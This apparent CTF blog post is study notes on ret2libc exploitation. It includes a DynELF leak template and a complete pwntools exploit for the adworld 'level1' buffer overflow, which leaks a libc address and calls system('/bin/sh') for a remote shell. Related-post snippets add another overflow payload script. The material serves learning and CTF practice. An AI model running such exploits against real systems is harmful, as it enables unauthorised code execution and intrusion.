【pwn】ROP--retlibc

最新推荐文章于 2024-11-02 19:36:16 发布
原创 最新推荐文章于 2024-11-02 19:36:16 发布 · 794 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#rop基础

本文分享了ROP中retlibc技术的学习心得,介绍了通过不同方法泄露库函数地址以获取libc版本的技巧,包括使用libcsearcher库、pwntools的Dynelf模块及在线查询网站。并以adworld level1为例,详细解析了如何利用这些信息实现远程代码执行。

ROP中对retlibc技术的一些学习心得

漏洞利用思路:

1.找到泄露库函数地址的漏洞,获取libc版本(因为一般不会给你libc.so文件)

查询libc版本一般有三种方法:
1.libcsearcher库。在编写exp的时候用from LibcSearcher import LibcSearcher导入
通过libc.dump('system')可以得到system函数的偏移,libc.dump('str_bin_sh')得到binsh字符串的偏移
2.pwntools自带的Dynelf,需要先构造一个leak函数和一个可以不断触发溢出的漏洞

一个模板:

def leak(address):


  #各种预处理


  payload = "xxxxxxxx" + address + "xxxxxxxx"


  p.send(payload)


  #各种处理


  data = p.recv(4)


  log.debug("%#x => %s" % (address, (data or '').encode('hex')))


  return data


d = DynELF(leak, elf=ELF("./xxx"))      #初始化DynELF模块 


systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址

	3.在线查询网站,通过函数的后三位数值查询。https://libc.blukat.me

典型的题目–adworld里的level1(非常典型的retlibc)

源码:

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  printf("What's this:%p?\n", &buf);			
  return read(0, &buf, 0x100u);		//溢出点
}

exp:

from pwn import *

from LibcSearcher import LibcSearcher

context.log_level='debug'

#sh = process('./level1')
sh=remote('111.198.29.45',42536)

writeplt= 0x08048370
readgot=0x0804A00C
vuln=0x0804847B



payload = 'a'*0x8c+p32(writeplt)+p32(vuln)+p32(1)+p32(readgot)+p32(4)

#gdb.attach(sh)
sh.sendline(payload)

readaddr=u32(sh.recv(4))
print(hex(readaddr))
libc = LibcSearcher('read', readaddr)
libcbase = readaddr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
payload='a'*0x8c+p32(system_addr)+'a'*4+p32(binsh_addr)
sh.sendline(payload)




sh.interactive()

sh.close()

笔记:

context.log_level='debug’开启调试模式

PWN-ROP
MuMuLee_的博客
08-27 810
题目:给出PWN2文件和libc 查看: 文件类型及其保护方法 找system和bin_sh都么有 所以只能利用libc文件 思路 计算偏移量=91
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7870
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8804
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
pwn-ROP
aitangdao4981的博客
05-23 335
首先对目标文件checksec,提示NX enabled,看看其解释 NX/DEP(堆栈不可执行) NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。 打开qira调试一下,报segmentation fa...
PWN题型之Ret2Libc
swedsn
03-18 6508
文章目录前言0x1 :使用前提条件0x2 :为什么要这么使用0x3 :使用方法0x4 :实例二、使用步骤总结 前言 菜鸡总结,如有不对,请指点 0x1 :使用前提条件 查看保护:开启了NX保护,但是没有开启PLE保护,可以开启canary保护。但是这样就是两种题型结合了。 打开IDA查看源代码:存在溢出条件,但是没有system函数(/bin/sh)和 flag字样。 ` 0x2 :为什么要这么使用 由于缺少system函数,所以需要构造shellcode。但是开启了NX保护(可执行的不可修改,可修改不可执
[CTF]PWN--新人入门第一关--Ret2libc
2301_79880752的博客
02-29 1776
首先我们需要找到pop rdi|ret这个指令在程序中的位置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
pwn学习-ret2libc1
Sa1nZen的博客
06-02 456
pwn学习-ret2libc1
pwn入门-buu第五页题解(32道)(更新完毕,下一章见)
2303_79366759的博客
09-01 909
然后就是修改IO_stdout结构体里面的内容了,把_IO_write_base适当修改即可打印出IO_stdout附近的内容,具体改成什么取决于你的机器,不过大概率需要爆破一位,所以只有1/16的成功率,不过本地的成功率却高得出奇,可能是本地没有那么随机化吧。这里我申请了一个idx为16的堆块,那么堆块地址的最低位是为0的,虽然我们不能edit(16),但是在这里edit(0)既然可以编辑我申请的idx为16的堆块,那么这样就可以轻松造成堆溢出,从而修改已经free掉的堆块的fd指针来实现任意地址改了。
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1893
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
pwn学习之ret2libc
weixin_43800829的博客
02-16 1486
title: pwn学习之ret2libc date: 2020-01-29 18:07:07 tags: pwn学习 在家无聊了的第二天,继续学习pwn的知识 ​ 今天看了看wiki-ret2libc的内容,觉得受益匪浅。 原理 ​ ret2libc说白了就是让我们之前的ret不往shellcode或者vul上跳 而是跳到了某个函数的plt或者got的位置 从而实现控制程序的函数去执行li...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
Pwn之初级ROP
Rinko233的博客
11-02 1254
初级ROP,包含ret2text , ret2shellcode , ret2syscall , ret2libc
PWN基础之构造ROP链(基本ROP
weixin_46132162的博客
02-02 7844
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
Ret2libc
钞sir的博客
01-26 9526
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
ret2libc
m0_62280492的博客
09-03 1488
ret2libc
pwn 查看陌生libc的版本
yongbaoii的博客
05-07 2046
我们经常在做一些pwn题的时候需要知道它的libc版本 因为不同的版本会有不同的影响,libc-2.24之后vtable多了检查,libc-2.27之后多了tcache。 那么题目给一个陌生的libc怎么知道它对应的版本? 拖到IDA里面。然后在字符串窗口搜索GNU就好了。 ...
攻防世界pwn pwn-100
最新发布
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界的PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问题。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值